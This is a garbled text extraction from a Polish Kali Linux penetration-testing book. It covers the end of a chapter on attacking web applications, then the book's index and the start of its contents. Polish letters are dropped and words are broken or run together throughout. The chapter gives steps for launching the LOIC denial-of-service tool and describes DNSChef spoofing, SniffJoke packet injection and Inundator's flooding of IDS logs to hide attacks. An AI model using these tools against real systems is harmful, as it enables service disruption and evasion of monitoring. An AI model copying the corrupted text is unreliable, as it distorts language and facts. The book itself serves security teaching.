Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Spis tre ci
O autorach 9
O recenzentach 11
Wst p 15
Co znajdziesz w tej ksi ce 16Czego potrzebujesz do pracy z ksi k 17Dla kogo przeznaczona jest ta ksi ka 17Konwencje 18Errata 18Piractwo 19
Rozdzia 1 Przygotowania 21
Podstawowe za o enia testoacutew penetracyjnych aplikacji internetowych 23Metodologia przeprowadzania testoacutew penetracyjnych 24
Ocena ryzyka 30Testy penetracyjne z wykorzystaniem systemu Kali Linux mdash za o enia 34
Etap 1 Rekonesans 34Etap 2 Wyszukiwanie podatno ci 35Etap 3 Wykorzystywanie zidentyfikowanych podatno ci 36Etap 4 Podnoszenie uprawnie 37Etap 5 Utrzymanie zdobytego przyczoacute ka 37
Wprowadzenie do systemu Kali Linux 38Konfiguracja systemu Kali Linux 39
Uruchamianie systemu Kali Linux z no nika zewn trznego 39Instalowanie systemu Kali Linux 40Kali Linux i pierwsze uruchomienie w maszynie wirtualnej 46
Przegl d narz dzi dost pnych w systemie Kali Linux 46Podsumowanie 49
Kup książkę Poleć książkę
Spis tre ci
4
Rozdzia 2 Rekonesans 51
Zadania rekonesansu 52Rozpoznanie wst pne 53
Strona internetowa firmy 53roacuted a przechowuj ce historyczne wersje witryn internetowych 54
